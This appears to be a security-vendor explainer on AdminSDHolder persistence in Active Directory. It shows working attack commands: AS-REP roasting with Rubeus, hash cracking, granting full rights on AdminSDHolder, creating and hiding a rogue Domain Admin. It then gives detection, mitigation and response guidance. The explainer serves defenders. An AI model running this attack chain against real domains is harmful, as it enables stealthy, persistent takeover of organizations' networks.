AdminSDHolder Modification is a persistence technique in which an attacker abuses the SDProp process in Active Directory to establish a persistent backdoor to Active Directory. Each hour (by default), SDProp compares the permissions on protected objects (e.g. the Domain Admins group) in Active Directory with those defined on a special container called AdminSDHolder. If they differ, it replaces the permissions on the protected object with those defined on AdminSDHolder. An adversary who modifies the AdminSDHolder container can establish a path of shadow administration and a means to regain administrative access to Active Directory.
How AdminSDHolder Modification Works
Hover to see each step
Step 1: Before an adversary is able to modify the AdminSDHolder container, they must gain administrative privilege in the domain. In this example, the adversary utilizes a tool like Rubeus to AS-REP roast a privileged user with Kerberos pre-authentication disabled.
PS> .\Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat [*] Action: AS-REP roasting [*] Target Domain : domain.com [*] Target DC : dc1 [*] Searching path 'LDAP://dc1/DC=domain,DC=com' for AS-REP roastable users [*] SamAccountName : joed [*] DistinguishedName : CN=Joe Dibley,OU=Users,OU=Admin,DC=domain,DC=com [*] Using domain controller: dc1 (10.154.201.1) [*] Building AS-REQ (w/o preauth) for: 'domain.com\joed' [+] AS-REQ w/o preauth successful! [*] Hash written to c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt [*] Roasted hashes written to : c:\Tools\Ghostpack\dotnet v4.5 compiled binaries\hashes.txt PS> .\hashcat.exe -m 18200 -o cracked.txt -a 0 .\Hash.txt .\wordlist.txt ... Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, AS-REP Hash.Target......: $firstname.lastname@example.org:e7d1f...2ac95c Time.Started.....: Thu Jul 23 18:58:36 2020 (0 secs) Time.Estimated...: Thu Jul 23 18:58:36 2020 (0 secs) Guess.Base.......: File (.\wordlist.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 97694 H/s (0.26ms) @ Accel:256 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 100/100 (100.00%) Rejected.........: 0/100 (0.00%) Restore.Point....: 0/100 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: 123456 -> taylor Hardware.Mon.#1..: Temp: 47c Fan: 34% Util: 32% Core:1265MHz Mem:2504MHz Bus:16 PS> Get-Content .\cracked.txt $email@example.com:e7d1f86a67ca41137f9a0b45d24f5795$3f8e0e7a0d8055d91a3fa2c67b537949e7dc30f41b797e01fa459d774d0c10c3fbc2488c7bb634db93118bb5a8dfe99107899f56e2542d39fef9b27d893fbaa5e92acd207b059b548d456f9daa18b24f0c9e83af16898eec8e9dbde3128772924a3f10e09cd66fbede311b3c3a4aa45d9feb6c49178dbab65dd8e38af89b3ac0fad7bde16b0bb50e25c8f6f92d29d5d3a9dc8e633e31db73dd06aa2e2a5e97053f73fada97564248d048fc74b7e13d56016210e6a3d1f4e4c7cafb60007bec16d682b3fd210bdaa1d2f3d44c717f19cf1583e814d92ace43991d132be1897ebeaa8b78daa7b29f1a3e03301c3920da1cf9bd8a887a92fc79280734e5acb2fadcfa05895f0f2ac95c:P@ssword!23 # domain\joed has a password of: P@ssword!23
Step 2: After successfully cracking the password hash obtained through AS-REP roasting, the adversary authenticates with the password and uses PowerSploit’s
Add-DomainObjectACL cmdlet to grant all privileges on the AdminSDHolder container to a normal user they’d previously compromised. The next time the
SDProp process runs, BobT’s new privileges will be applied to all protected objects.
PS> runas /noprofile /user:domain\joed powershell.exe # --- New Window Opens --- # PS> Import-Module .\PowerSploit.psd1 PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System' -PrincipalIdentity BobT -Rights All PS> # Confirming Permissions Added PS> Get-DomainObjectAcl -Identity `CN=AdminSDHolder,CN=System` -ResolveGUIDs InheritedObjectType : All ObjectDN : CN=AdminSDHolder,CN=System,DC=Domain,DC=com ObjectType : All IdentityReference : Domain\BobT IsInherited : False ActiveDirectoryRights : GenericAll PropagationFlags : None ObjectFlags : None InheritanceFlags : None InheritanceType : None AccessControlType : Allow ObjectSID :
Step 3: At this stage, the adversary has control of the JoeD and BobT accounts and has created a persistence mechanism that will allow them to regain Domain Admins privileges if they lose access to JoeD. BobT is, in effect, a shadow administrator of the Active Directory domain.
In this example, the adversary has lost access to JoeD’s account. Instead of having to AS-REP roast again (perhaps pre-authentication was enabled!) or use some other method, the attacker can use BobT’s account to re-establish their position.
PS> Add-ADGroupMember -Identity "Domain Admins" -Members BobT PS> # Re-authenticate as User1 to get updated group membership or if no password then wait until user re-autenticates PS> runas.exe /user:domain\BobT powershell PS> New-ADOrganizationalUnit -Path "DC=domain,DC=com" -Name "Users" PS> New-ADUser -AccountPassword (ConvertTo-SecureString -AsPlainText -Force -String "MySimplePassword123!") -SamAccountName PaulaS -Name "Paula Smith" -DisplayName "Paula Smith" -EmailAddress "Paula.Smith@domain.com" -PasswordNeverExpires $True -Path "OU=Users,DC=domain,DC=com" PS> Add-ADGroupMember -Identity "Domain Admins" -Members PaulaS PS> # Hide the PaulaS and Users OU PS> Import-Module RACE.psm1 PS> Set-ADACL -SamAccountName Everyone -Right ReadProperty -Type Deny -DistinguishedName (Get-ADUser PaulaS) PS> Set-ADACL -SAMAccountName Everyone -Right ListChildren -Type Deny -DistinguishedName "OU=Users,DC=domain,DC=com" PS> # Remove BobT from Domain Admins to hide privileges PS> Remove-ADGroupMember -Identity "Domain Admins" -Members BobT PC>
Detect, Mitigate, and Respond
Watching for changes to the AdminSDHolder container ACL is a good way to detect potentially malicious activity. In a normal environment, changes to AdminSDHolder should occur infrequently and follow change control processes. Event ID 5136 in the Audit Directory Service Changes subcategory of the Windows event log monitors directory service changes. To identify changes to the AdminSDHolder container ACL, monitor events which match the
ObjectDN “CN=AdminSDHolder,DC=System” and the
AttributeLDAPDisplayName is ‘nTSecurityDescriptor’.
The following XPath filter can be used in the Windows Event Viewer to detect modifications to the AdminSDHolder container ACL.
<QueryList> <Query Id="0" Path="Security"> <Select Path="Security"> *[System[(EventID=5136)]] and *[EventData[Data[@Name='ObjectDN'] and (Data='CN=AdminSDHolder,CN=System,DC=YourDomain,DC=com')]] and *[EventData[Data[@Name='AttributeLDAPDisplayName'] and (Data='nTSecurityDescriptor')]] </Select> </Query> </QueryList>
It is also possible to detect certain signs of DCShadow in Windows event logs. In order to mimic a domain controller, DCShadow must make several changes in Active Directory: 1) add a new
NTDSDSA object, and 2) add a global catalog (
GC/<host>) servicePrincipalName to a computer object that is not a known domain controller. After the attack is completed, these items are removed.
The AdminSDHolder container is a core part of Active Directory. By default, only users with administrative privileges in Active Directory are able to modify their ACL. To mitigate the risk of unauthorized modification:
- Routinely audit AdminSDHolder permissions for unauthorized or unnecessary permissions.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from the workstation to a server or domain controller. Eliminating these pathways to privilege escalation is essential.
- Aggressively embrace the principle of least privilege.
If unauthorized permissions are granted on the AdminSDHolder container, the following actions can be taken to respond:
- Activate the incident response process and alert the response team
- Remove the newly added ACL; if done before the
SDPropprocess runs (by default every 60 minutes) no new permissions on protected objects would be propagated
- Reset the password of the user that performed the unauthorized modification of the AdminSDHolder container ACL. Optionally disable the user to a) force instantaneous replication to all domain controllers, and b) disrupt the adversary’s use of that account
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities